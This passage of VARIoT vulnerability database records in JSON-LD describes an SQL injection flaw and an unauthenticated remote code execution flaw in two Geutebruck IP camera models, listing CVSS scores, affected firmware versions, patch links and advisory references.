            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "An SQL injection vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an attacker to alter stored data. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7528",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E94500-39AB-11E9-A236-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "id": "VAR-201803-2218",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.817000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "GeutebruckIPCamerasSQL injection vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122849"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79348"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7528"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7528"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "date": "2018-03-22T18:29:01.087000",
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06024"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137560"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          },
          {
            "date": "2024-11-21T04:12:18.187000",
            "db": "NVD",
            "id": "CVE-2018-7528"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck G-Cam/EFD-2250 and  Topline TopFD-2125 In  SQL Injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003345"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e94500-39ab-11e9-a236-000c29342cb1"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-762"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-201803-2221

    Vulnerability from variot - Updated: 2024-11-23 21:53

    Unauthentication vulnerabilities have been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 contain an authentication vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The G-Cam/EFD-2250 and Topline TopFD-2125 are both high-definition cameras from Geutebruck. Geutebruck IP cameras have a remote code execution vulnerability that an attacker can exploit to execute arbitrary code. Multiple Geutebruck devices are prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability; 2. A SQL-injection vulnerability; 3. A cross-site request-forgery vulnerability; 4. An access-bypass vulnerability; 5. A security-bypass vulnerability; 6. A cross-site scripting vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 and Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of the German company Geutebrück.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2221",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7532",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-7532",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06019",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-137564",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-7532",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7532",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7532",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06019",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-761",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "IVD",
                "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1",
                "trust": 0.2,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137564",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Unauthentication vulnerabilities have been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. GeutebruckIPCameras has a remote code execution vulnerability that an attacker can exploit to execute arbitrary code. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7532",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E6FB10-39AB-11E9-8292-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "id": "VAR-201803-2221",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.778000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck IPCameras Remote Code Execution Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122847"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79347"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 1.7,
            "url": "https://randorisec.fr/0day-anonymous-rce-on-geutebruck-ip-cameras-again/"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7532"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7532"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7532"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e6fb10-39ab-11e9-8292-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06019"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137564"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003346"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-761"
          },
          {
            "db": "NVD",
